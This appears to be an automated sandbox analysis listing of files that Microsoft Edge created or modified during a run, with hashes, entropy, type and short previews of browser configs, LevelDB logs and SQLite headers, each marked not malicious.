                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):358860
                                                                                                                                                      Entropy (8bit):5.324609566810379
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6R9:C1gAg1zfvF
                                                                                                                                                      MD5:C4D75E53D8664BB1D49F2884A05CA75A
                                                                                                                                                      SHA1:8D3FED77078605A34CD85611092EE5971BE2C129
                                                                                                                                                      SHA-256:C8DB8894BD56338D1309DBD367576056014E82F32F58EF114977A7256D707206
                                                                                                                                                      SHA-512:03056DCBC4D25355D01C3E722EFD45165093E19C5338E94933821B3FB2704AF1889ACB32579CE1B220ED03C4AAD76F38C498EAFECCE5E192FDE80D5317AADF0A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):16
                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):209
                                                                                                                                                      Entropy (8bit):1.8784775129881184
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCTCTCT
                                                                                                                                                      MD5:478D49D9CCB25AC14589F834EA70FB9E
                                                                                                                                                      SHA1:5D30E87D66E279F8815AFFE4C691AAF1D577A21E
                                                                                                                                                      SHA-256:BB6CC6DF54CF476D95409032C79E065F4E10D512E73F7E16018E550456F753D5
                                                                                                                                                      SHA-512:FB5431054A23D3C532568B1F150873D9130DBC4A88BE19BC2A4907D0DC2888C5B55993154EAD4A6C466E2173092B8705684A6802B850F051639E1F2457387471
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):16
                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):281
                                                                                                                                                      Entropy (8bit):5.134899026391676
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:jjFL+q1wkn23oH+Tcwt8aVdg2KLlJjM1Iq2Pwkn23oH+Tcwt8aPrqIFUv:Q1fYeb0L81IvYfYebL3FUv
                                                                                                                                                      MD5:C506A9B6239C8FF7117CB99839D6CE82
                                                                                                                                                      SHA1:BC2B358B7B2E58B54EEA21A5BB7FC88112FB9F1F
                                                                                                                                                      SHA-256:6A13CA0C0E479DD5E048A3BF93819A674E5836B7115E2AE9E6D2E80499CBA662
                                                                                                                                                      SHA-512:61A7B4A17AEB4B5265ECB7673374956EDDC1A359A88E26D3C6C61F53F49387A2EFD83D53AB0E69E5773D7EFF9CB2A09F9E4A881C94F1A043833B3AE7F8D20E72
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:2024/12/04-07:58:11.750 1ef0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules since it was missing..2024/12/04-07:58:11.777 1ef0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):41
                                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):16
                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):209
                                                                                                                                                      Entropy (8bit):1.8784775129881184
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCTCTCT
                                                                                                                                                      MD5:478D49D9CCB25AC14589F834EA70FB9E
                                                                                                                                                      SHA1:5D30E87D66E279F8815AFFE4C691AAF1D577A21E
                                                                                                                                                      SHA-256:BB6CC6DF54CF476D95409032C79E065F4E10D512E73F7E16018E550456F753D5
                                                                                                                                                      SHA-512:FB5431054A23D3C532568B1F150873D9130DBC4A88BE19BC2A4907D0DC2888C5B55993154EAD4A6C466E2173092B8705684A6802B850F051639E1F2457387471
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):16
                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):285
                                                                                                                                                      Entropy (8bit):5.143301408582903
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:jj6uiF+q1wkn23oH+Tcwt86FB2KLlJjMIq2Pwkn23oH+Tcwt865IFUv:SC1fYeb/FFLcIvYfYeb/WFUv
                                                                                                                                                      MD5:AF190C6CA8840FCFF3B817A337963F70
                                                                                                                                                      SHA1:DD05E58B4A50348DA38C812C4A09AD073332B879
                                                                                                                                                      SHA-256:39D2D0A1CD7A80473A50544AC98BC5D6EEC0A050F4A94D67CF00FE1F540EC914
                                                                                                                                                      SHA-512:D131D3720BBC1EBB997F90BAEA8CA60D9A1ED892476CE7AC1F8E5C076614D30F52DB05918A57C4C122A5BB8F43FC31B3E7078A74325D529EA9D0551D0FC3857F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:2024/12/04-07:58:11.780 1ef0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts since it was missing..2024/12/04-07:58:11.795 1ef0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):41
                                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1197
                                                                                                                                                      Entropy (8bit):1.8784775129881184
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW:
                                                                                                                                                      MD5:A2A3B1383E3AAC2430F44FC7BF3E447E
                                                                                                                                                      SHA1:B807210A1205126A107A5FE25F070D2879407AA4
                                                                                                                                                      SHA-256:90685D4E050DA5B6E6F7A42A1EE21264A68F1734FD3BD4A0E044BB53791020A2
                                                                                                                                                      SHA-512:396FAB9625A2FF396222DBC86A0E2CDE724C83F3130EE099F2872AED2F2F2ECE13B0853D635F589B70BD1B5E586C05A3231D68CAF9E46B6E2DAC105A10D0A1C8
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):322
                                                                                                                                                      Entropy (8bit):5.140901016603696
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:jjeRWS4q2Pwkn23oH+Tcwt8NIFUt8mjeRxMbJZmw+mjeRxMbDkwOwkn23oH+TcwY:2MS4vYfYebpFUt8JnMbJ/+JnMbD5JfYN
                                                                                                                                                      MD5:E85A1067758FB10EB9F23045107B6948
                                                                                                                                                      SHA1:F2935042AD7C69D67B8C93FDF3A6F74FA9432837
                                                                                                                                                      SHA-256:53DC9B6D87DA91295F7AB9DAF665EF0EB660984B324A3A62ECE58E17FC41AE12
                                                                                                                                                      SHA-512:C737BA64AA8C4CB973432078CCA3E83EDAFC548B6CF37318B2BB80B2F92AB45694D75D512E008A8A79FE00165596131B50B2E0B7CD8CDC9B1340BB03BD45CB33
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:2024/12/04-07:58:12.441 1f24 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/04-07:58:12.442 1f24 Recovering log #3.2024/12/04-07:58:12.442 1f24 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):322
                                                                                                                                                      Entropy (8bit):5.140901016603696
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:jjeRWS4q2Pwkn23oH+Tcwt8NIFUt8mjeRxMbJZmw+mjeRxMbDkwOwkn23oH+TcwY:2MS4vYfYebpFUt8JnMbJ/+JnMbD5JfYN
                                                                                                                                                      MD5:E85A1067758FB10EB9F23045107B6948
                                                                                                                                                      SHA1:F2935042AD7C69D67B8C93FDF3A6F74FA9432837
                                                                                                                                                      SHA-256:53DC9B6D87DA91295F7AB9DAF665EF0EB660984B324A3A62ECE58E17FC41AE12
                                                                                                                                                      SHA-512:C737BA64AA8C4CB973432078CCA3E83EDAFC548B6CF37318B2BB80B2F92AB45694D75D512E008A8A79FE00165596131B50B2E0B7CD8CDC9B1340BB03BD45CB33
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:2024/12/04-07:58:12.441 1f24 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/04-07:58:12.442 1f24 Recovering log #3.2024/12/04-07:58:12.442 1f24 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 1, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4096
                                                                                                                                                      Entropy (8bit):0.3169096321222068
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:lSWbNFl/sl+ltl4ltllOl83/XWEEabIDWzdWuAzTgdWj3FtFIU:l9bNFlEs1ok8fDEPDadUTgd81Z
                                                                                                                                                      MD5:2554AD7847B0D04963FDAE908DB81074
                                                                                                                                                      SHA1:F84ABD8D05D7B0DFB693485614ECF5204989B74A
                                                                                                                                                      SHA-256:F6EF01E679B9096A7D8A0BD8151422543B51E65142119A9F3271F25F966E6C42
                                                                                                                                                      SHA-512:13009172518387D77A67BBF86719527077BE9534D90CB06E7F34E1CCE7C40B49A185D892EE859A8BAFB69D5EBB6D667831A0FAFBA28AC1F44570C8B68F8C90A4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 8, cookie 0x8, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):32768
                                                                                                                                                      Entropy (8bit):0.40981274649195937
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TL1WK3iOvwxwwweePKmJIOAdQBVA/kjo/TJZwJ9OV3WOT/5eQQ:Tmm+/9ZW943WOT/
                                                                                                                                                      MD5:1A7F642FD4F71A656BE75B26B2D9ED79
                                                                                                                                                      SHA1:51BBF587FB0CCC2D726DDB95C96757CC2854CFAD
                                                                                                                                                      SHA-256:B96B6DDC10C29496069E16089DB0AB6911D7C13B82791868D583897C6D317977
                                                                                                                                                      SHA-512:FD14EADCF5F7AB271BE6D8EF682977D1A0B5199A142E4AB353614F2F96AE9B49A6F35A19CC237489F297141994A4A16B580F88FAC44486FCB22C05B2F1C3F7D1
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j............M.....8...b..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):429
                                                                                                                                                      Entropy (8bit):5.809210454117189
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                      MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                      SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                      SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                      SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, 1st free page 10, free pages 4, cookie 0x45, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):159744
                                                                                                                                                      Entropy (8bit):0.5442450459459186
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:J2TU+bGzPDLjGQLBE3up+U0jBo4tgi3JMe9xJDECVjNg:JZ+GPXBBE3upb0HtTTDxVj
                                                                                                                                                      MD5:748109ADFF87B5C7F6674E260B9F13CA
                                                                                                                                                      SHA1:18493F381B6570CF632281BBAC86A6489ABA9B31
                                                                                                                                                      SHA-256:FFACF35102453DFC58CBAD146934AF062483128260F120A329878E3183F614D7
                                                                                                                                                      SHA-512:F856DC8ABCB53E1F34ED289F3C16682E86AFD56D7B7B9ACBEF1CF371D8FA1B36E3D2C0108889983A10568125E0ECBA1D01535575F14822C91D713B701A257EA4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ .......'...........E......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8720
                                                                                                                                                      Entropy (8bit):0.32697544764293207
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:qlKHA/J3+t76Y4QZZofU99pO0BY0bqR4EZY4QZvGI:GhHQws9LdQBQZGI
                                                                                                                                                      MD5:9BA1FA8B21A301D62F3D0049E82C21C4
                                                                                                                                                      SHA1:DA65F8A79AC8C9E2FF1BAFF9D9F340B093511785
                                                                                                                                                      SHA-256:7B3E57FC365D4EA82D2D7E168B9C7F710F903AB1DBB46C134A4BC38D2424D90E
                                                                                                                                                      SHA-512:61AF4D8D58C3A80437379EEC779DF4B6E2AEE0009FD848CC42170A68C9472544326DE18B2C4704E3F323F2590CA46D535E2F9614104E5144077AE659AFE15562
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:............l0....'....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):115717
                                                                                                                                                      Entropy (8bit):5.183660917461099
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                      MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                      SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                      SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                      SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 11, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):45056
                                                                                                                                                      Entropy (8bit):3.5494159260691815
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:zj9P04cVP/Kbtn773pL7hwgam6IzRKToaAkQkQerZ:zdIVP/e7B9jRKcYe2Z
                                                                                                                                                      MD5:661076BF1D0DDA9DAF90D1AB18A69604
                                                                                                                                                      SHA1:CC7C6A420B1771DC354159E95CF5973DC3B29A1B
                                                                                                                                                      SHA-256:E246D895868A252F3069927264C5185D8CD3F58A19C60B78D85FB3E751FFA596
                                                                                                                                                      SHA-512:A11F53A87222A8D24B183446E18E2EF906F4A2F8604860F269A8CB39E88852E054CFBDB146AACFDE5A1ECA450944A616AC83034149366AD4B841E1E446A7213B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):406
                                                                                                                                                      Entropy (8bit):5.27463213309324
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:XkvYfYeb8rcHEZrELFUt8HX/+HF5JfYeb8rcHEZrEZSJ:eYfYeb8nZrExg8yJfYeb8nZrEZe
                                                                                                                                                      MD5:B3E6CAC902F4F06BF9B6BEB3C053C15D
                                                                                                                                                      SHA1:4471C3837C3EF62B7209AFAC1C7C04AAF5FF1C95
                                                                                                                                                      SHA-256:F5D4C54D5E21FC8AC9075A4DBD8566004D16DFF4C46EDC1E64954A1501CAD57F
                                                                                                                                                      SHA-512:AD077E992194B7D4B2B116AEDC98634FA4325A67839588B344A94B903D6ECDEB7A7A5EC03714A2F0C73AA2E273D6A7F6FB89506CC19578F68FD395DEEF5F8165
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:2024/12/04-07:58:13.093 1ef0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/04-07:58:13.094 1ef0 Recovering log #3.2024/12/04-07:58:13.094 1ef0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):406
                                                                                                                                                      Entropy (8bit):5.27463213309324
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:XkvYfYeb8rcHEZrELFUt8HX/+HF5JfYeb8rcHEZrEZSJ:eYfYeb8nZrExg8yJfYeb8nZrEZe
                                                                                                                                                      MD5:B3E6CAC902F4F06BF9B6BEB3C053C15D
                                                                                                                                                      SHA1:4471C3837C3EF62B7209AFAC1C7C04AAF5FF1C95
                                                                                                                                                      SHA-256:F5D4C54D5E21FC8AC9075A4DBD8566004D16DFF4C46EDC1E64954A1501CAD57F
                                                                                                                                                      SHA-512:AD077E992194B7D4B2B116AEDC98634FA4325A67839588B344A94B903D6ECDEB7A7A5EC03714A2F0C73AA2E273D6A7F6FB89506CC19578F68FD395DEEF5F8165
                                                                                                                                                      Malicious:false
